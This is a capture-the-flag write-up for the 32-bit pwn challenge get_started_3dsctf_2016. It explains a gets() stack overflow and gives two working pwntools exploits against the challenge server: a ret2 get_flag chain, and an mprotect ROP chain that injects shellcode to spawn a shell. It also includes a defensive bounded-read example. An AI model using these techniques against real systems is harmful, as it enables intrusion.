get_started_3dsctf_2016
2022-06-24 06:43:00 【[mzq]】

checksec shows the program is 32-bit with only a few protections enabled, none of which get in the way. Let's look at it in IDA.

main function

int __cdecl main(int argc, const char **argv, const char **envp)
{
    char v4; // [esp+4h] [ebp-38h]
    printf("Qual a palavrinha magica? ", v4);
    gets(&v4); // gets() has no length limit, so the stack buffer can be overflowed without bound
    return 0;
}
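The root cause is the unbounded gets() call. As an added example (not from the original write-up), here is the same 56-byte frame read with a bounded replacement that can never write past the buffer, with a sentinel standing in for the saved frame data the overflow would otherwise overwrite. The struct layout, the sentinel value and the input lines are constructed for the demonstration.

```c
#define _POSIX_C_SOURCE 200809L   /* for fmemopen() */
#include <stdio.h>
#include <string.h>

/* Mirrors the 56-byte buffer in the challenge's main(); the sentinel stands
 * in for the saved frame data that the overflow in the write-up clobbers. */
struct frame {
    char buf[56];
    unsigned int sentinel;
};

/* Bounded replacement for gets(): never writes past cap, strips the newline,
 * and drains the remainder of an over-long line so leftover bytes cannot be
 * consumed by a later read. Returns 0 if the line fit, 1 if it was truncated,
 * -1 on EOF or error. */
int read_line_bounded(char *dst, size_t cap, FILE *in)
{
    if (cap == 0 || fgets(dst, (int)cap, in) == NULL)
        return -1;
    size_t len = strlen(dst);
    if (len > 0 && dst[len - 1] == '\n') {
        dst[len - 1] = '\0';
        return 0;
    }
    int c, truncated = 0;
    while ((c = fgetc(in)) != EOF && c != '\n')
        truncated = 1;              /* leftover bytes: the line did not fit */
    return truncated;
}

/* Constructed input: line_len 'A's followed by a newline, read into a frame.
 * Returns -1 if the sentinel was clobbered, otherwise the reader's result. */
int try_line(size_t line_len)
{
    char input[1024];
    if (line_len > sizeof input - 2)
        return -1;
    memset(input, 'A', line_len);
    input[line_len] = '\n';
    input[line_len + 1] = '\0';
    struct frame f;
    memset(&f, 0, sizeof f);
    f.sentinel = 0xDEADBEEFu;
    FILE *in = fmemopen(input, line_len + 1, "r");
    if (in == NULL)
        return -1;
    int rc = read_line_bounded(f.buf, sizeof f.buf, in);
    fclose(in);
    return f.sentinel == 0xDEADBEEFu ? rc : -1;
}
```

A 55-byte line fits exactly; anything longer is reported as truncated while the sentinel stays intact.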
get_flag function

We arrange for a1 == 0x308CD64F && a2 == 0x195719D1 and put the address of exit in get_flag's return-address slot; that is enough to get the flag printed out.
void __cdecl get_flag(int a1, int a2)
{
    int v2; // eax
    int v3; // esi
    unsigned __int8 v4; // al
    int v5; // ecx
    unsigned __int8 v6; // al
    if ( a1 == 0x308CD64F && a2 == 0x195719D1 ) // only when a1 and a2 match the given constants is the flag read
    {
        v2 = fopen("flag.txt", "rt");
        v3 = v2;
        v4 = getc(v2);
        if ( v4 != 255 )
        {
            v5 = (char)v4;
            do
            {
                putchar(v5);
                v6 = getc(v3);
                v5 = (char)v6;
            }
            while ( v6 != 255 );
        }
        fclose(v3);
    }
}
exp1
from pwn import *

# io = process("./get_started_3dsctf_2016")   # local test
io = remote("node4.buuoj.cn", 26448)
elf = ELF("./get_started_3dsctf_2016")
context(log_level="debug", arch="i386")

get_flag_addr = elf.symbols["get_flag"]
exit_addr = elf.symbols["exit"]
ret_addr = 0x08048196          # a bare `ret` gadget
a1 = 0x308CD64F
a2 = 0x195719D1
print(hex(get_flag_addr), hex(exit_addr))

# 56 bytes of padding reach the saved return address; the ret gadget then
# returns into get_flag, whose own return address is exit and whose two
# arguments a1, a2 follow it on the stack.
payload = flat([b"a"*56, ret_addr, get_flag_addr, exit_addr, a1, a2])
io.sendline(payload)
io.recv()

mprotect function
Reference: https://blog.csdn.net/qq_32095699/article/details/114225953

In short, mprotect assigns permissions to a region of memory; it is a Linux system function that takes three arguments:
The first argument is an address: the start of the region to operate on.
The second argument is the length of the region, counted from that address.
The third argument is the permissions to assign.
These three arguments are held in ebx, esi and ebp, which is why the gadget used in exp2 pops exactly those three registers.
int __cdecl mprotect(int a1, int a2, int a3)
{
    int result; // eax
    result = dl_sysinfo(a2, a3);
    JUMPOUT(result, -4095, _syscall_error);
    return result;
}
See also https://www.wenjiangs.com/doc/dtkwp70q9e#ef45581adcf1589aa9c8efb9d4c10ec4

exp2
The second method simply uses mprotect to make a region readable and writable (0x7 also makes it executable), writes shellcode to that address, and then jumps to it. It is not really that complicated.
from pwn import *

# io = process("./get_started_3dsctf_2016")   # local test
io = remote("node4.buuoj.cn", 26448)
elf = ELF("./get_started_3dsctf_2016")
context(log_level="debug", arch="i386")

mprotect_addr = elf.symbols["mprotect"]
read_plt = elf.symbols["read"]
pop_ebx_esi_ebp_ret = 0x0804f460   # pops the three mprotect arguments off the stack
buf = 0x8048000                     # page-aligned load address of the 32-bit non-PIE binary
print(mprotect_addr)

# mprotect(buf, 0x1000, 0x7) makes the page RWX; the pop gadget clears its
# three arguments and returns into read(0, buf, 0x200), which returns to buf,
# where the shellcode sent on the next line has just been written.
payload = flat([b"a"*0x38, mprotect_addr, pop_ebx_esi_ebp_ret, buf, 0x1000, 0x7,
                read_plt, buf, 0, buf, 0x200])
io.sendline(payload)
shellcode = asm(shellcraft.sh(), arch="i386")
io.sendline(shellcode)
io.interactive()